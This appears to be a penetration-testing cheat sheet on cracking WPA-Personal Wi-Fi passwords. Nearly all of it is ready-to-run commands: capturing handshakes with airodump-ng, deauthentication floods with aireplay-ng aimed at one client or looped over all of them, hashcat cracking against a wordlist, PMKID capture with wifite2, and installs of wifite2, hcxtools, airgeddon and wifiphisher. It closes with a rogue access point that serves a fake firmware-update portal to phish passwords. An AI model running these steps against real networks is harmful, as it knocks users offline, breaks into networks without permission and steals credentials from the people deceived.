Personal

Wi-Fi Protected Access Personal

4-Way Handshake

1. Look for targets. Save BSSID (00:00:00:00:00:01), CH (9), ESSID (SomeEssid) and STATION (00:00:00:00:00:02) if deauth will be required:

$ sudo airodump-ng -M -U wlan1 [-c 36-165 (for 5GHz, see WLAN channels) or just -c 1-200 for all] [--band <abg>]
qq

2. Start dumping the target's traffic:

[$ sudo iwconfig wlan1 channel 9]
$ sudo airodump-ng -c 9 --bssid 00:00:00:00:00:01 -w SomeEssid wlan1

3. Send DeAuth packets in a separate terminal till WPA handshake: XX:XX:XX:XX:XX:XX appears (aggressive):

$ sudo aireplay-ng [-D] -0 2 -a 00:00:00:00:00:01 -c 00:00:00:00:00:02 wlan1
Or
$ for client in `cat 00:00:00:00:00:01.txt`; do sudo aireplay-ng -D -0 2 -a 00:00:00:00:00:01 -c $client wlan1; done

4. Clean the capture, check it once again, covert to Hashcat format and crack it:

$ aircrack-ng SomeEssid*.cap
$ wpaclean SomeEssid-cleaned.cap SomeEssid-01.cap
$ cowpatty -r SomeEssid-cleaned.cap -s SomeEssid -c
$ /usr/lib/hashcat-utils/cap2hccapx.bin SomeEssid-cleaned.cap SomeEssid.hccapx
$ hashcat -m 2500 -O -a 0 -w 3 --session=wpa2 -o wpa2.out wpa2.in SomeEssid.hccapx seclists/Passwords/darkc0de.txt

wifite2

$ sudo wifite -vi wlan1 --clients-only --wpa --no-wps

PMKID

wifite2

$ sudo wifite -vi wlan1 --pmkid

wifite2

Install wifite2:

$ git clone https://github.com/derv82/wifite2 ~/tools/wifite2 && cd ~/tools/wifite2
$ sudo python setup.py install

Install hcxdumptool (for capturing PMKID hashes):

$ git clone https://github.com/ZerBea/hcxdumptool.git ~/tools/hcxdumptool && cd ~/tools/hcxdumptool
$ sudo apt install libcurl4-openssl-dev libssl-dev -y
$ make
$ sudo make install

Install (for converting PMKID packet captures into hashcat's format):

$ git clone https://github.com/ZerBea/hcxtools.git ~/tools/hcxtools && cd ~/tools/hcxtools
$ make
$ sudo make install

Fire up wifite2:

$ sudo wifite -vi wlan1 [--kill] [-5]

airgeddon

$ git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.git ~/tools/airgeddon && cd ~/tools/airgeddon
$ sudo bash airgeddon.sh

wifiphisher

Install:

$ git clone https://github.com/wifiphisher/wifiphisher.git ~/tools/wifiphisher && cd ~/tools/wifiphisher
$ sudo python3 setup.py install # Install any dependencies

Start a rogue AP with fake captive portal (firmware update scenario) on wlan1 and deauth clients with wlan2:

$ sudo wifiphisher -aI wlan1 -eI wlan2 -p wifi_connect

Last updated 1 year ago